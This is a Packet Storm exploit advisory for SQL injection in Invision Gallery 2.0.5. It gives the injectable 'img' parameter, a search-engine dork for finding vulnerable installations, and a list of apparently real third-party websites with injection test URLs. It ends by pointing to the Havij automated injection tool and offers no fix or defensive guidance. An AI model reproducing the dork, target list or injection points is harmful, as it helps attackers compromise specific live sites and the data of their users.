Invision Gallery 2.0.5 SQL Injection

2013-01-17T00:00:00
ID PACKETSTORM:119636
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-01-17T00:00:00

Description

                                        
                                            `##############  
# Exploit Title : Invision Gallery SQL Injection  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# software Homepage: www.invisionpower.com/apps/gallery/  
#  
# Home : ww.Ashiyane.org  
#  
# Security Risk : High - SQL Injection  
#  
# version : 2.0.5  
#  
# Dork : Invision Gallery 2.0.5 © 2013 IPS, Inc. inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img=  
#  
##############  
#location: site/index.php?automodule=gallery&cmd=si&img=[SQL]  
# or site/act=module&module=gallery&cmd=si&img=[SQL]   
#  
#  
#DEMO:  
#  
# www.sgheadphones.net/index.php?act=module&module=gallery&cmd=si&img=448%27  
#  
# www.rfdf.ru/forum/index.php?act=module&module=gallery&cmd=si&img=698%27  
#  
# www.bamburakentaja.com/forums/index.php?act=module&module=gallery&cmd=si&img=41%27  
#  
# forum.lacrimosa.ws/index.php?automodule=gallery&cmd=si&img=42%27  
#  
# www.chaos.su/forum/index.php?automodule=gallery&cmd=si&img=3  
#  
# ngevacorp.freehostia.com/index.php?automodule=gallery&cmd=si&img=726%27  
#  
##############  
# [Inject with Havij or inject manually]  
##############  
#Greetz to: My Lord ALLAH  
##############  
#  
#Amirh03in  
#  
##############   
`